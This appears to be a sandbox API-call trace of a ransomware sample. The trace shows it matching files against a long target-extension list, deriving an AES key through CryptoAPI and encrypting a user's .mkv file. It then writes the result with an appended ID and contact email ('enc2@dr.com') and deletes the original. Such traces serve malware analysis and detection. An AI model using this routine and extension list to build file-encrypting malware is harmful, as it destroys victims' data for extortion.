	[0183.608] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mkv") returned=".mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.608] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.609] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.609] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.612] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xd7c0, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0xd7c0, lpOverlapped=0x0) returned 1
	[0183.615] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.615] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcba18) returned 1
	[0183.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.617] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0183.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.618] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.618] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.618] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb8fb0) returned 1
	[0183.618] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.618] CryptEncrypt (in: hKey=0xfb8fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0xd7c0, dwBufLen=0xd7c0 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0xd7d0) returned 1
	[0183.619] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.620] RtlMoveMemory (in: Destination=0xfea948, Source=0xfdd180, Length=0xd7c0 | out: Destination=0xfea948) 
	[0183.620] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.620] CryptEncrypt (in: hKey=0xfb8fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfea948*, pdwDataLen=0x18aefc*=0xd7c0, dwBufLen=0xd7d0 | out: pbData=0xfea948*, pdwDataLen=0x18aefc*=0xd7d0) returned 1
	[0183.621] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.621] CryptDestroyKey (hKey=0xfb8fb0) returned 1
	[0183.621] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.621] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0183.621] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.621] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0183.621] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.622] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.622] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.622] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0183.625] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 106
	[0183.625] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.625] WriteFile (in: hFile=0x390, lpBuffer=0xfea948*, nNumberOfBytesToWrite=0xd7d0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfea948*, lpNumberOfBytesWritten=0x18b358*=0xd7d0, lpOverlapped=0x0) returned 1
	[0183.630] CloseHandle (hObject=0x390) returned 1
	[0183.630] CloseHandle (hObject=0x388) returned 1
	[0183.631] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv")) returned 1
	[0183.637] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv")) returned 0
	[0183.637] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d66f050, ftCreationTime.dwHighDateTime=0x1d96804, ftLastAccessTime.dwLowDateTime=0x2b1a0850, ftLastAccessTime.dwHighDateTime=0x1d974d6, ftLastWriteTime.dwLowDateTime=0x2b1a0850, ftLastWriteTime.dwHighDateTime=0x1d974d6, nFileSizeHigh=0x0, nFileSizeLow=0x3473, dwReserved0=0x0, dwReserved1=0x0, cFileName="mYz _.jpg", cAlternateFileName="MYZ_~1.JPG")) returned 1
	[0183.637] lstrcmpW (lpString1="mYz _.jpg", lpString2="..") returned 1
	[0183.637] lstrcmpW (lpString1="mYz _.jpg", lpString2=".") returned 1
	[0183.637] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\"
	[0183.638] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\", lpString2="mYz _.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\mYz _.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\mYz _.jpg"
	[0183.638] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\mYz _.jpg") returned 50
	[0183.638] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.638] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\mYz _.jpg", cchLength=0x32 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg") returned 0x32
	[0183.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.639] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.639] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg") returned="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg"
	[0183.639] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\myz _.jpg") returned 50
	[0183.639] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.640] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0183.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.640] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.640] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
